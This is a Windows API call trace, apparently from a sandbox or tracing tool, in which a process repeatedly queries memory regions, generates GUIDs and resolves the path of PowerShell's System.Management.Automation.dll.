	[0161.666] VirtualQuery (in: lpAddress=0x14d000, lpBuffer=0x14e000, dwLength=0x1c | out: lpBuffer=0x14e000*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.667] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.667] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.669] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.669] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.669] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.670] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.670] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.670] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.670] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.671] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.672] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.673] VirtualQuery (in: lpAddress=0x14ce3c, lpBuffer=0x14de3c, dwLength=0x1c | out: lpBuffer=0x14de3c*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.673] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.674] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.674] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.674] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.675] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xec1ba1a0, Data2=0x4d59, Data3=0x407e, Data4=([0]=0xb0, [1]=0xe1, [2]=0x8a, [3]=0xb4, [4]=0x90, [5]=0xb, [6]=0x8e, [7]=0x14))) returned 0x0
	[0161.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.675] GetLastError () returned 0x0
	[0161.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.675] GetLastError () returned 0x0
	[0161.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.675] GetLastError () returned 0x0
	[0161.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.675] GetLastError () returned 0x0
	[0161.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.675] GetLastError () returned 0x0
	[0161.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.675] GetLastError () returned 0x0
	[0161.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.676] GetLastError () returned 0x0
	[0161.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.677] GetLastError () returned 0x0
	[0161.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.677] GetLastError () returned 0x0
	[0161.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.677] GetLastError () returned 0x0
	[0161.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.677] GetLastError () returned 0x0
	[0161.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.677] GetLastError () returned 0x0
	[0161.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.677] GetLastError () returned 0x0
	[0161.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.678] GetLastError () returned 0x0
	[0161.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.678] GetLastError () returned 0x0
	[0161.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.678] GetLastError () returned 0x0
	[0161.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.678] GetLastError () returned 0x0
	[0161.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.678] GetLastError () returned 0x0
	[0161.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.678] GetLastError () returned 0x0
	[0161.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.678] GetLastError () returned 0x0
	[0161.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.679] GetLastError () returned 0x0
	[0161.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.679] GetLastError () returned 0x0
	[0161.679] VirtualQuery (in: lpAddress=0x14d000, lpBuffer=0x14e000, dwLength=0x1c | out: lpBuffer=0x14e000*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.836] GetLastError () returned 0x0
	[0161.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.836] GetLastError () returned 0x0
	[0161.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.836] GetLastError () returned 0x0
	[0161.836] VirtualQuery (in: lpAddress=0x14d000, lpBuffer=0x14e000, dwLength=0x1c | out: lpBuffer=0x14e000*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.837] GetLastError () returned 0x0
	[0161.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.837] GetLastError () returned 0x0
	[0161.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.837] GetLastError () returned 0x0
	[0161.837] VirtualQuery (in: lpAddress=0x14d000, lpBuffer=0x14e000, dwLength=0x1c | out: lpBuffer=0x14e000*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.837] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.838] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.839] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.840] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.840] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.840] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.840] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.841] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.841] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.841] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.842] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.842] VirtualQuery (in: lpAddress=0x14ce3c, lpBuffer=0x14de3c, dwLength=0x1c | out: lpBuffer=0x14de3c*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.842] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.843] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.844] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.844] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.844] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x44df26fa, Data2=0xdd7f, Data3=0x4762, Data4=([0]=0x9d, [1]=0x12, [2]=0x84, [3]=0x53, [4]=0x6, [5]=0x46, [6]=0x3b, [7]=0x3c))) returned 0x0
	[0161.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.844] GetLastError () returned 0x0
	[0161.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.844] GetLastError () returned 0x0
